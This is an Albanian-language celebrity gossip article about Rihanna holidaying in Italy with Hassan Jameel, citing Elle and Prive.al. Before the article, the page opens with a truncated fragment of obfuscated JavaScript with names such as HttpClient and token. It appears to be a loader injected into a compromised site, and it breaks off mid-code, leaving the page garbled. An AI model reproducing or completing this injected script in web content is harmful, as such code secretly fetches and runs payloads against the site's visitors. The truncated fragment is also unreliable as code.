;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rihanna po e jeton jetën! Kapet mat në krahët e të dashurit në Itali

By

Rihanna literalisht po e jeton jetën e ëndrrave në bregdetin e Amalfit në Itali, me të dashurin e saj miliarder, arabin Hassan Jameel.

Fotografët paparaci, kanë kapur ca momente private të Ririt duke u përkëdhelur me të dashurin e saj Jameel gjatë ditës së djeshme.

Sipas agjencisë që i ka realizuar fotografitë, çifti kanë marrë për shëtitje një barkë dhe më pas kanë ngrënë drekë në një vend të quajtur Lo Scoglio in nerano, me një grup njerëzish që besohet të jenë familjarë të Jameel, shkruan Elle, transmeton Prive.

“Ajo e ka mbajtur fshehur këtë lidhje deri më tani, mirëpo ata kanë qenë bashkë që nga Janari”, ka thënë një burim për Elle. “Kjo lidhje është goxha serioze. Ata të dy kanë qëndruar larg syve të publikut dhe lidhja e tyre është e fortë. Familja e Jameel është shumë e pasur dhe po ashtu e do privatësinë. Rihanna gjatë kësaj kohe, ka udhëtuar tërë kohën për në Britani të Madhe që të takohet me të”, thonë burime pranë këngëtares për revistën Elle.

Në anën tjetër, Rihanna kishte thënë për T Magazine, se muajin e kaluar ajo ishte shpërngulur në Londër, e kjo mund të jetë një tregues se gjërat janë bërë goxha serioze mes tyre. /Prive.al

Rihanna and Hassan Jameel in Italy

Artikuj të ngjashëm